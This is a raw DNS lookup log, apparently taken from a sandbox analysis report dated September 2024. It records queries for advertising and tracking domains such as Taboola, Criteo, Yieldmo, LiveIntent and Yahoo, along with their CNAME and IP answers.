                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.883342981 CEST1.1.1.1192.168.2.40x4f4aNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.883342981 CEST1.1.1.1192.168.2.40x4f4aNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.883342981 CEST1.1.1.1192.168.2.40x4f4aNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.883342981 CEST1.1.1.1192.168.2.40x4f4aNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.883920908 CEST1.1.1.1192.168.2.40x24f5No error (0)htlb.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.883971930 CEST1.1.1.1192.168.2.40x6876No error (0)htlb.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.883971930 CEST1.1.1.1192.168.2.40x6876No error (0)htlb.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.891836882 CEST1.1.1.1192.168.2.40xa1e4No error (0)bidder.criteo.comin-ftd-65.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.892013073 CEST1.1.1.1192.168.2.40x97b5No error (0)bidder.criteo.comin-ftd-65.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.892013073 CEST1.1.1.1192.168.2.40x97b5No error (0)in-ftd-65.nl3.vip.prod.criteo.com178.250.1.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.894634008 CEST1.1.1.1192.168.2.40x20d5No error (0)rtb.openx.net35.186.253.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.894634008 CEST1.1.1.1192.168.2.40x20d5No error (0)rtb.openx.net35.227.252.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.906204939 CEST1.1.1.1192.168.2.40xafdeNo error (0)hbopenbid.pubmatic.comhbprebid-v3.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.906204939 CEST1.1.1.1192.168.2.40xafdeNo error (0)hbprebid-v3.pubmnet.comhbopenbid-ams.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.906232119 CEST1.1.1.1192.168.2.40x756bNo error (0)hbopenbid.pubmatic.comhbprebid-v3.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.906232119 CEST1.1.1.1192.168.2.40x756bNo error (0)hbprebid-v3.pubmnet.comhbopenbid-ams.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.906232119 CEST1.1.1.1192.168.2.40x756bNo error (0)hbopenbid-ams.pubmnet.com185.64.189.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.909198999 CEST1.1.1.1192.168.2.40xed6aNo error (0)prebid.media.net34.120.63.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.916960001 CEST1.1.1.1192.168.2.40x7ba7No error (0)tlx.3lift.comeu-tlx.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.916960001 CEST1.1.1.1192.168.2.40x7ba7No error (0)eu-tlx.3lift.com18.157.230.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.916960001 CEST1.1.1.1192.168.2.40x7ba7No error (0)eu-tlx.3lift.com3.124.64.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.916960001 CEST1.1.1.1192.168.2.40x7ba7No error (0)eu-tlx.3lift.com3.78.168.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.917011976 CEST1.1.1.1192.168.2.40x13f5No error (0)tlx.3lift.comeu-tlx.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.923224926 CEST1.1.1.1192.168.2.40x7834No error (0)ads.yieldmo.comrw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.923224926 CEST1.1.1.1192.168.2.40x7834No error (0)rw.yieldmo.comgdpr.rw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.923224926 CEST1.1.1.1192.168.2.40x7834No error (0)gdpr.rw.yieldmo.comrw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.923224926 CEST1.1.1.1192.168.2.40x7834No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com63.34.124.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.923224926 CEST1.1.1.1192.168.2.40x7834No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com54.75.182.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.923224926 CEST1.1.1.1192.168.2.40x7834No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.209.79.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.923224926 CEST1.1.1.1192.168.2.40x7834No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com63.32.50.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.923224926 CEST1.1.1.1192.168.2.40x7834No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.250.181.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.923224926 CEST1.1.1.1192.168.2.40x7834No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.50.81.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.923224926 CEST1.1.1.1192.168.2.40x7834No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.31.240.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.923224926 CEST1.1.1.1192.168.2.40x7834No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com54.194.52.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.923234940 CEST1.1.1.1192.168.2.40x1ecaNo error (0)ads.yieldmo.comrw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.923234940 CEST1.1.1.1192.168.2.40x1ecaNo error (0)rw.yieldmo.comgdpr.rw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.923234940 CEST1.1.1.1192.168.2.40x1ecaNo error (0)gdpr.rw.yieldmo.comrw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.924248934 CEST1.1.1.1192.168.2.40xaa43No error (0)pips.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.924248934 CEST1.1.1.1192.168.2.40xaa43No error (0)dualstack.tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.924248934 CEST1.1.1.1192.168.2.40xaa43No error (0)dualstack.tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.924248934 CEST1.1.1.1192.168.2.40xaa43No error (0)dualstack.tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.924248934 CEST1.1.1.1192.168.2.40xaa43No error (0)dualstack.tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.924971104 CEST1.1.1.1192.168.2.40x8c64No error (0)pips.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.932859898 CEST1.1.1.1192.168.2.40x3789No error (0)uipus.semasio.net50.57.31.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.945111990 CEST1.1.1.1192.168.2.40x4ffbNo error (0)rp.liadm.comlivepixel-production.bln.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.945111990 CEST1.1.1.1192.168.2.40x4ffbNo error (0)livepixel-production.bln.liveintent.com54.237.79.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.945111990 CEST1.1.1.1192.168.2.40x4ffbNo error (0)livepixel-production.bln.liveintent.com44.207.126.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.945111990 CEST1.1.1.1192.168.2.40x4ffbNo error (0)livepixel-production.bln.liveintent.com52.5.88.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.945111990 CEST1.1.1.1192.168.2.40x4ffbNo error (0)livepixel-production.bln.liveintent.com44.209.251.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.945111990 CEST1.1.1.1192.168.2.40x4ffbNo error (0)livepixel-production.bln.liveintent.com18.233.92.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.945111990 CEST1.1.1.1192.168.2.40x4ffbNo error (0)livepixel-production.bln.liveintent.com52.207.180.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.945111990 CEST1.1.1.1192.168.2.40x4ffbNo error (0)livepixel-production.bln.liveintent.com34.192.71.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.945111990 CEST1.1.1.1192.168.2.40x4ffbNo error (0)livepixel-production.bln.liveintent.com18.215.36.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.946836948 CEST1.1.1.1192.168.2.40x302No error (0)rp.liadm.comlivepixel-production.bln.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:13.407717943 CEST1.1.1.1192.168.2.40x1372No error (0)i.clean.gg34.95.69.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:15.208291054 CEST1.1.1.1192.168.2.40xc630No error (0)beacon.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:15.208291054 CEST1.1.1.1192.168.2.40xc630No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:15.208291054 CEST1.1.1.1192.168.2.40xc630No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:15.208291054 CEST1.1.1.1192.168.2.40xc630No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:15.208291054 CEST1.1.1.1192.168.2.40xc630No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:15.210171938 CEST1.1.1.1192.168.2.40x9ae2No error (0)beacon.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:15.539170027 CEST1.1.1.1192.168.2.40x3cd4No error (0)pbd.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:15.539170027 CEST1.1.1.1192.168.2.40x3cd4No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:15.539170027 CEST1.1.1.1192.168.2.40x3cd4No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:15.539184093 CEST1.1.1.1192.168.2.40x574aNo error (0)pbd.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:15.802170038 CEST1.1.1.1192.168.2.40x8984No error (0)pagead-googlehosted.l.google.com142.250.185.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.238646984 CEST1.1.1.1192.168.2.40x50c7No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.239665031 CEST1.1.1.1192.168.2.40x4db4No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.239665031 CEST1.1.1.1192.168.2.40x4db4No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.239665031 CEST1.1.1.1192.168.2.40x4db4No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.584754944 CEST1.1.1.1192.168.2.40xb18No error (0)finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.692200899 CEST1.1.1.1192.168.2.40xd726No error (0)finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.692200899 CEST1.1.1.1192.168.2.40xd726No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.692200899 CEST1.1.1.1192.168.2.40xd726No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.783255100 CEST1.1.1.1192.168.2.40x40a6No error (0)rp.liadm.comlivepixel-production.bln.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.786176920 CEST1.1.1.1192.168.2.40xe610No error (0)rp.liadm.comlivepixel-production.bln.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.786176920 CEST1.1.1.1192.168.2.40xe610No error (0)livepixel-production.bln.liveintent.com18.233.92.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.786176920 CEST1.1.1.1192.168.2.40xe610No error (0)livepixel-production.bln.liveintent.com54.237.79.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.786176920 CEST1.1.1.1192.168.2.40xe610No error (0)livepixel-production.bln.liveintent.com34.192.71.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.786176920 CEST1.1.1.1192.168.2.40xe610No error (0)livepixel-production.bln.liveintent.com52.5.88.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.786176920 CEST1.1.1.1192.168.2.40xe610No error (0)livepixel-production.bln.liveintent.com35.171.253.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.786176920 CEST1.1.1.1192.168.2.40xe610No error (0)livepixel-production.bln.liveintent.com34.225.196.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.786176920 CEST1.1.1.1192.168.2.40xe610No error (0)livepixel-production.bln.liveintent.com52.207.180.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.786176920 CEST1.1.1.1192.168.2.40xe610No error (0)livepixel-production.bln.liveintent.com18.215.36.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:17.881517887 CEST1.1.1.1192.168.2.40x60edNo error (0)pbd.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:17.881517887 CEST1.1.1.1192.168.2.40x60edNo error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:17.881517887 CEST1.1.1.1192.168.2.40x60edNo error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:17.882400990 CEST1.1.1.1192.168.2.40xe8f2No error (0)pbd.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:17.959537983 CEST1.1.1.1192.168.2.40x585No error (0)s.aolcdn.comcs629.wpc.lambdacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:17.960258007 CEST1.1.1.1192.168.2.40xd971No error (0)s.aolcdn.comcs629.wpc.lambdacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:17.960258007 CEST1.1.1.1192.168.2.40xd971No error (0)cs629.wpc.lambdacdn.net192.229.221.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.979793072 CEST1.1.1.1192.168.2.40x9fcaNo error (0)ssum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.979793072 CEST1.1.1.1192.168.2.40x9fcaNo error (0)ssum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.980452061 CEST1.1.1.1192.168.2.40x53c5No error (0)ads.pubmatic.compubmatic.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.980881929 CEST1.1.1.1192.168.2.40xfccNo error (0)ssum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.981535912 CEST1.1.1.1192.168.2.40xf341No error (0)u.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.981535912 CEST1.1.1.1192.168.2.40xf341No error (0)u.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.981789112 CEST1.1.1.1192.168.2.40x882bNo error (0)ads.pubmatic.compubmatic.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.982583046 CEST1.1.1.1192.168.2.40xc4aeNo error (0)eus.rubiconproject.comeus.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.982713938 CEST1.1.1.1192.168.2.40x2d60No error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.982713938 CEST1.1.1.1192.168.2.40x2d60No error (0)eu-eb2.3lift.com76.223.111.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.982713938 CEST1.1.1.1192.168.2.40x2d60No error (0)eu-eb2.3lift.com13.248.245.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.983108997 CEST1.1.1.1192.168.2.40x42bfNo error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.983371973 CEST1.1.1.1192.168.2.40x17d5No error (0)js-sec.indexww.com172.64.149.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.983371973 CEST1.1.1.1192.168.2.40x17d5No error (0)js-sec.indexww.com104.18.38.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.983624935 CEST1.1.1.1192.168.2.40x4253No error (0)eus.rubiconproject.comeus.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.984250069 CEST1.1.1.1192.168.2.40xe63No error (0)js-sec.indexww.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.984406948 CEST1.1.1.1192.168.2.40x334aNo error (0)ads.yieldmo.comrw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.984406948 CEST1.1.1.1192.168.2.40x334aNo error (0)rw.yieldmo.comgdpr.rw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.984406948 CEST1.1.1.1192.168.2.40x334aNo error (0)gdpr.rw.yieldmo.comrw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.984406948 CEST1.1.1.1192.168.2.40x334aNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.209.79.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.984406948 CEST1.1.1.1192.168.2.40x334aNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com54.75.182.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.984406948 CEST1.1.1.1192.168.2.40x334aNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.31.240.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.984406948 CEST1.1.1.1192.168.2.40x334aNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com54.194.52.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.984406948 CEST1.1.1.1192.168.2.40x334aNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.49.117.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.984406948 CEST1.1.1.1192.168.2.40x334aNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.250.181.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.984406948 CEST1.1.1.1192.168.2.40x334aNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com63.32.50.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.984406948 CEST1.1.1.1192.168.2.40x334aNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.50.81.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.985163927 CEST1.1.1.1192.168.2.40x1210No error (0)ads.rubiconproject.comdigicertwc.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.986311913 CEST1.1.1.1192.168.2.40xff6aNo error (0)ads.yieldmo.comrw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.986311913 CEST1.1.1.1192.168.2.40xff6aNo error (0)rw.yieldmo.comgdpr.rw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.986311913 CEST1.1.1.1192.168.2.40xff6aNo error (0)gdpr.rw.yieldmo.comrw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.986566067 CEST1.1.1.1192.168.2.40x15ceNo error (0)ads.rubiconproject.comdigicertwc.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:20.626689911 CEST1.1.1.1192.168.2.40x7927No error (0)sb.scorecardresearch.com18.245.60.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:20.626689911 CEST1.1.1.1192.168.2.40x7927No error (0)sb.scorecardresearch.com18.245.60.107A (IP address)IN (0x0001)false
